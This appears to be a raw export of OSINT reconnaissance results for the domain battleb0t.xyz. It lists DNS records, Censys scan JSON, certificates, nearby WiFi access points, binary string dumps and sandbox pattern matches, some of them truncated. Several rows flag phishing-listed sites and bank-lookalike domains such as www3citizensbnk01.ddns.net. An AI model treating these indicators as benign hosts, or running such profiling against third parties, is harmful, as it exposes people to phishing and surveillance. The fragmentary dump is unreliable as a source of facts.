h="";(f=a.config_.yb)&&(h=f);var k=a.config_.Ab||!1,l=Li(k,h,d);Object.assign(g.headers,l);(f=g.headers.Authorization)&&!h&&(g.headers["x-origin"]=window.location.origin);var m="/youtubei/"+a.config_.innertubeApiVersion+"/"+b,p={alt:"json"},u=a.config_.zb&&f;u=u&&f.startsWith(" (Indicator: "youtube")\n "bedCode=lo.prototype.getVideoEmbedCode;lo.prototype.getOptions=lo.prototype.getOptions;lo.prototype.getOption=lo.prototype.getOption;\nSn.push(function(a){var b=a;b||(b=document);a=gb(b.getElementsByTagName("yt:player"));var c=b||document;if(c.querySelectorAll&&c.querySelector)b=c.querySelectorAll(".yt-player");else{var d;c=document;b=b||c;if(b.querySelectorAll&&b.querySelector)b=b.querySelectorAll(".yt-player");else if(b.getElementsByClassName){var e=b.getElementsByClassName("yt-player");b=e}else{e=b.getElementsByTagName("*");var f={};for(c=d=0;b=e[c];c++){var g=b.className,h;if(h="function"==typeof g.split)h=0<=bb(g.split(/\\s+/),\n"yt-player");h&&(f[d++]=b)}f.length=d;b=f}}b=gb(b);E(fb(a,b),ro)});\n"undefined"!=typeof YTConfig&&YTConfig.parsetags&&"onload"!=YTConfig.parsetags||Un();var so=A.onYTReady;so&&so();var to=A.onYouTubeIframeAPIReady;to&&to();var uo=A.onYouTubePlayerAPIReady;uo&&uo();}).call(this);" (Indicator: "youtube")'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://builder.zilliongigs.com/free/help56/mail?=17342"\n Pattern match: "http://builder.zilliongigs.com"\n Heuristic match: "builder.zilliongigs.com"\n Pattern match: "www.upsitely.com"\n Heuristic match: "code.jquery.com"\n Heuristic match: "maindesk-userclient4.duckdns.org"\n Heuristic match: "pxlme.me"\n Heuristic match: "releases.jquery.com"\n Heuristic match: "gth=e+f;for(var g=0;g<f;g++)a[e+g]=d[g]}else a.push(d)}}\n;function ib(a,b){for(var c in a)b.call(void 0,a[c],c,a)}\nfunction jb(a){var b=kb,c;for(c in b)if(a.call(void 0,b[c],c,b))return c}\nfunction lb(a,b){for(var c in a)if(!(c in b)||a[c]!==b[c])return!1;"\n Heuristic match: "f]=a[d],++f,++d,f==this.blockSize){vf(this,e);f=0;break}}this.j=f;this.m+=b}};\nuf.prototype.digest=function(){var a=[],b=8*this.m;56>this.j?this.update(this.l,56-this.j):this.update(this.l,this.blockSize-(this.j-56));for(var c=this.blockSiz | 104.196.30.220 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | StreamElements (Category: finance)
https://streamelements.com/login | login |
| 2023-05-12 02:54:21 | HTTP Status Code | No | Web Spider | 0 | 0 | 5 | 0 | None | 200 | http://vscode.battleb0t.xyz/cdn-cgi/styles/main.css |
| 2023-05-12 03:03:33 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 007us.github.io |
| 2023-05-12 02:54:34 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["7c5b18b39c858117-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 104.21.71.14 |
| 2023-05-12 02:44:14 | IPv6 Address | No | DNS Resolver | 15 | 0 | 1 | 0 | None | 2606:50c0:8001::153 | battleb0t.xyz |
| 2023-05-12 03:13:04 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [000hen.github.io]
https://www.openphish.com/feed.txt | 000hen.github.io |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | CableWiFi (Net ID: 00:0D:67:65:A6:FC) | 32.8608, -79.9746 |
| 2023-05-12 02:44:05 | SSL Certificate - Issued to | No | CertSpotter | 1 | 0 | 1 | 0 | None | C=US,ST=California,L=San Francisco,O=Cloudflare\, Inc.,CN=sni.cloudflaressl.com | battleb0t.xyz |
| 2023-05-12 02:52:24 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 185.199.111.133:443 | 185.199.111.0/24 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Andrea Schwartz Gallery (Net ID: 00:01:9F:3D:4F:68) | 37.780462,-122.390564 |
| 2023-05-12 03:33:36 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | PLTE$
kyhNlC2D
kShPAJ
esyS_S@?
txkST`ANdNO
rXYuPYXHR
XajGc
dzvRt
IDATx
:7MV-
'@crrX
QK>@W
vWP`Z
tmv1q
XEFi"
4@1hb
a'c:3
2FRB>
LHiiB
YFI6D
.f:9Lsy
PDad6
k67iB
'phZQ
_tJ/o8
qgd0 f
D3f1c
-\-u?V
\e<<N
X?YJa
IDAT<mJ
ISE>E
>O$-'
H T:1
g !A"B
Ff<3Bz\
TQHocI
Dp//>
<U'Xk
V M55j
\T:x
u>6N9z@
IDATB
zt28zQ
NL3:\m
l?:6
_ycqP
t1nT_
o !ABH
FbaS\
d5hR8
sGr`G
hFGxh\
\0.:H
a$QEC
o"5mw
su<<
f33Jt
yNEEt
IDATd
9LGKOA
NwqWx
s<N5xh
dNHEJrV
?B v-zfB
zX 9lkh
0cp/8
Pcwr`
sP:\J>
.H2Dy
InIPC
W$4n_
?S5qq
pRoh_
NsV`L
XHhLy
1B 2"ND
/U.m
__OjA
lcJE!
Hyfoi
Xlyfh/
rFtB6
`hPT/
c B/A
` a>A
Zl>VEY
Yq0Kxq4
Ye-wdW
3s7!B
4`0 V
EwJ/.lsQ
fyB0I0
Y"<XN/h
C 3JE
OLbC1
WhdHn
l:ZLd
Sq4RXv
!4hgr | https://pics.battleb0t.xyz/images/random_6.PNG |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | HinaJasmin (Net ID: 00:01:E3:08:AE:FB) | 50.1188, 8.6843 |
| 2023-05-12 03:00:40 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.44): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 3Com (Net ID: 00:14:7C:52:C6:E4) | 40.2024, 29.0398 |
| 2023-05-12 03:00:30 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | sntrup761x25519-sha512@openssh.com | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T07:25:44.787Z", "ip": "46.101.229.70", "labels": ["remote-access"], "location_updated_at": "2023-05-01T12:20:02.406356Z", "autonomous_system_updated_at": "2023-05-01T12:20:02.407454Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"www3citi5ensbnk01.nerdpol.ovh": {"record_type": "A", "resolved_at": "2023-05-08T21:52:09.615214562Z"}, "www3citizensbnk01.ddns.net": {"record_type": "A", "resolved_at": "2023-04-03T07:30:40.764584949Z"}, "www3citlzensbnk.ddns.net": {"record_type": "A", "resolved_at": "2023-04-23T19:19:28.631638390Z"}, "chainsyncpages.ddns.net": {"record_type": "A", "resolved_at": "2023-04-05T19:58:37.967204478Z"}, "mail.46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-05-03T14:09:55.384272288Z"}, "jnbt05.easypanel.host": {"record_type": "A", "resolved_at": "2023-05-10T17:13:22.939829997Z"}, "intelligent-euclid.46-101-229-70.plesk.page": {"record_type": "A", "resolved_at": "2023-04-28T22:08:15.278436745Z"}, "www.46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-04-30T14:18:11.707553225Z"}, "46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-04-30T14:18:11.520320906Z"}}, "names": ["chainsyncpages.ddns.net", "www3citi5ensbnk01.nerdpol.ovh", "www3citizensbnk01.ddns.net", "www3citlzensbnk.ddns.net", "www.46-101-229-70.cprapid.com", "46-101-229-70.cprapid.com", "intelligent-euclid.46-101-229-70.plesk.page", "jnbt05.easypanel.host", "mail.46-101-229-70.cprapid.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.94.145.60", "extended_service_name": "SSH", "observed_at": "2023-05-11T07:25:44.640117776Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_ORANGE", "transport_fingerprint": {"raw": "28960,64,true,MSTNW,1460,false,false", "os": "Ubuntu / Debian / CentOS", "id": 72}, "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "654b926728b59e31856ca456546380aae9ad6f0105be964db40d456c35d8474b", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "b/8s4eFX87LHgM34ZW3g9GyhRKNQyQUUsPt17LQ/ZJc=", "x": "OF+EuiYliuprX40ENBhAbc+GOunuKTpVTjg/1oXm5JM=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "sntrup761x25519-sha512@openssh.com", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Ubuntu-3ubuntu0.1", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_8.9p1", "raw": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1"}, "hassh_fingerprint": "699519fdcc30cbcd093d5cd01e4b1d56"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Ubuntu-3ubuntu0.1"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "Linux", "vendor": "Ubuntu", "source": "OSI_APPLICATION_LAYER", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "8.9p1", "source": "OSI_APPLICATION_LAYER", "other": {"family": "OpenSSH"}, "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:8.9p1:*:*:*:*:*:*:*", "part": "a"}]}], "autonomous_system": {"bgp_prefix": "46.101.128.0/17", "country_code": "US", "asn": 14061, "name": "DIGITALOCEAN-ASN", "description": "DIGITALOCEAN-ASN"}} |
| 2023-05-12 03:00:31 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | aes128-gcm@openssh.com | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T01:15:51.449Z", "ip": "207.154.228.169", "labels": ["remote-access"], "location_updated_at": "2023-04-26T16:44:53.689109Z", "autonomous_system_updated_at": "2023-04-26T16:44:53.689174Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"demo.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:33.692371432Z"}, "www.gitlab.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-22T18:54:15.274018983Z"}, "www.blog.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:28.495668467Z"}, "sitemap.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-17T14:45:58.102845672Z"}, "mail.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-09T22:38:36.279855979Z"}, "sitemaps.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-27T22:00:34.142966985Z"}, "www.magento.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-25T04:27:35.542554385Z"}, "the.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:05.045794814Z"}, "git.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-18T22:02:08.010914546Z"}, "why.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:50.763792122Z"}, "blog.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:41.064561319Z"}, "pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:33.203437608Z"}, "www.staging.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-27T22:00:31.907335501Z"}, "www.mail.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:15.687219106Z"}, "www.polygon.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:50.199285708Z"}, "www.getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-27T22:00:33.577672224Z"}, "dev.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:03.141552446Z"}, "gitlab.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-22T10:53:09.803238695Z"}, "magento.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-23T23:59:18.482468579Z"}, "abs.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-22T17:03:22.221262680Z"}, "shop.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:40.132954471Z"}, "apk.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:33.628764632Z"}, "www.sitemaps.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:42.479130613Z"}, "store.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:04.021634906Z"}, "www.mail.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-02T14:44:59.299521244Z"}, "blog.getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-26T21:45:12.270323061Z"}, "www.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:51.220733315Z"}, "gitlab.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-22T17:03:25.974047797Z"}, "getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-23T23:59:43.775790789Z"}, "www.test.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:04.458677133Z"}, "www.sitemap.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-23T16:20:35.410578926Z"}, "27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:49.792043016Z"}, "www.27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-26T21:45:11.528325040Z"}, "polygon.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-20T22:28:11.409230997Z"}, "staging.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-23T16:20:15.055432105Z"}, "www.old.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-18T22:01:33.780417520Z"}, "www.gitlab.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:09.056676609Z"}, "the.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:43.060825855Z"}, "mail.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:03.585095495Z"}, "old.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-20T22:28:10.411213800Z"}, "www.shop.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:06.772740465Z"}, "posadisad.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:15.103803419Z"}, "www.git.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-22T17:03:24.300688116Z"}, "app.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:28.045102600Z"}, "www.store.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T16:00:25.103894275Z"}, "on.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:18.198972199Z"}, "www.blog.getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:08.475610608Z"}, "www.dev.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-26T21:44:39.836624314Z"}, "crm.sirket.im": {"record_type": "A", "resolved_at": "2023-05-10T17:17:53.506957947Z"}, "javadfra.softether.net": {"record_type": "A", "resolved_at": "2023-05-09T20:04:58.925278232Z"}, "www.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:18.498526700Z"}, "tsxwdq.easypanel.host": {"record_type": "A", "resolved_at": "2023-04-29T17:33:24.980088481Z"}, "wow.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-20T14:24:20.099465955Z"}, "test.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-20T00:13:37.049342133Z"}, "what.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-17T14:45:49.646289405Z"}, "at.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-13T14:57:51.931938167Z"}, "polygon.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:42.054213831Z"}, "in.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:34.386503067Z"}, "www.polygon.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:34.836285670Z"}, "www.demo.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:02.797080934Z"}, "app.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:06.212849951Z"}}, "names": ["sitemap.posadisad.com", "the.pointlane.com", "shop.pointlane.com", "test.pointlane.com", "www.staging.pointlane.com", "www.blog.getsimnum.posadisad.com", "abs.posadisad.com", "getsimnum.posadisad.com", "in.pointlane.com", "posadisad.com", "magento.pointlane.com", "crm.sirket.im", "mail.pointlane.com", "www.mail.posadisad.com", "staging.pointlane.com", "sitemaps.posadisad.com", "pointlane.com", "www.sitemap.posadisad.com", "blog.getsimnum.posadisad.com", "www.demo.pointlane.com", "demo.pointlane.com", "what.pointlane.com", "www.store.pointlane.com", "www.old.pointlane.com", "www.mail.pointlane.com", "app.pointlane.com", "www.gitlab.pointlane.com", "app.posadisad.com", "27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com", "blog.posadisad.com", "javadfra.softether.net", "at.pointlane.com", "mail.posadisad.com", "polygon.pointlane.com", "git.posadisad.com", "gitlab.posadisad.com", "old.pointlane.com", "wow.posadisad.com", "polygon.posadisad.com", "gitlab.pointlane.com", "apk.pointlane.com", "www.magento.pointlane.com", "www.polygon.pointlane.com", "dev.pointlane.com", "www.27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com", "the.posadisad.com", "www.blog.posadisad.com", "store.pointlane.com", "www.dev.pointlane.com", "www.getsimnum.posadisad.com", "why.posadisad.com", "www.test.pointlane.com", "www.shop.pointlane.com", "on.pointlane.com", "www.polygon.posadisad.com", "tsxwdq.easypanel.host", "www.posadisad.com", "www.gitlab.posadisad.com", "www.git.posadisad.com", "www.sitemaps.posadisad.com", "www.pointlane.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.248.133.49", "extended_service_name": "SSH", "observed_at": "2023-05-11T01:15:50.786715445Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_NTT", "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "547dbd625a27506b11586280f4a822637523e4a0ab006b506caadd882fb07151", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "8oJhdPmy3h9TMJvWg4Uf9bFwsyMd8Wzn2vYjEAGHvAA=", "x": "+yukgG2Uj68iboVSBhBnXM3KU5F0vU7GhjX/PobpTIQ=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sh |
| 2023-05-12 03:00:54 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 007ayong.github.io | 185.199.111.153 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | DNA (Net ID: 00:01:71:0B:C5:CC) | 52.3759, 4.8975 |
| 2023-05-12 02:46:17 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | GitLab - GitLab Inc. is an open-core company that operates GitLab, a DevOps software package which can develop, secure, and operate software. The open source software project was created by Ukrainian developer Dmytro Zaporozhets and Dutch developer Sytse Sijbrandij. | cdn-185-199-111-153.github.com |
| 2023-05-12 03:03:17 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | cpcontacts.ayhu.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:89:7c:23:d8:89:20:d1:c5:b3:ae:30:91:44:3a:23:81:b8
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 14 03:53:54 2022 GMT
Not After : Mar 14 03:53:53 2023 GMT
Subject: CN=ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:e5:dd:af:99:9d:87:f1:20:42:ec:19:5a:16:81:
fd:0e:9d:26:43:5b:38:56:01:6c:b9:50:e6:f5:f6:
b7:f4:d9:bc:a6:0e:cd:0a:31:b3:8d:bb:24:04:a8:
02:3f:69:7e:f7:45:10:b5:ca:a5:a1:b5:01:ba:b7:
e8:82:36:5d:7d:4a:67:2b:ea:ed:c8:9d:a8:7d:86:
41:b8:e4:07:fc:50:be:f8:c2:12:f9:9a:f1:3d:47:
b3:9a:27:60:00:dc:a5:4f:8f:6f:e6:86:11:01:b1:
d6:45:d6:cf:7d:92:d8:dd:11:ac:e5:b9:41:b6:0c:
38:5e:c6:36:d3:ff:6e:0d:84:9c:c2:8a:cc:3f:7f:
39:73:81:05:d0:7c:d4:98:d7:c4:2e:70:4d:8f:5d:
72:05:90:a8:a3:08:60:0e:68:3c:fe:ac:07:23:66:
f2:29:3f:3b:9e:fe:9e:1a:5d:c2:2b:f9:d5:68:01:
b1:7f:26:80:2c:5d:d8:4c:d8:54:56:d0:35:f9:31:
4d:76:6c:1a:c1:ba:c3:e7:3a:74:2f:ed:05:4b:a4:
71:2f:df:1e:d5:dc:b9:23:46:96:17:ad:cc:ef:a5:
ee:d7:26:ac:0b:5d:33:ef:55:fd:c5:75:d0:bb:f3:
29:99:ce:33:73:02:ba:2d:3b:cc:c0:6b:10:49:90:
f8:db
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
3D:15:56:A1:3D:00:5C:E7:21:10:87:5C:48:60:81:D6:19:B0:97:7A
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:ayhu.xyz, DNS:cpanel.ayhu.xyz, DNS:cpcalendars.ayhu.xyz, DNS:cpcontacts.ayhu.xyz, DNS:mail.ayhu.xyz, DNS:webdisk.ayhu.xyz, DNS:webmail.ayhu.xyz, DNS:www.ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
26:b6:b9:a7:2f:e5:4c:52:ac:47:f6:61:c0:02:b0:ef:8e:c3:
a6:d3:f1:ec:92:c0:a2:e1:7b:19:b2:3a:4e:87:84:15:a6:4c:
8a:85:bd:36:13:13:c4:da:73:35:49:ef:cb:b3:e1:6a:f3:e3:
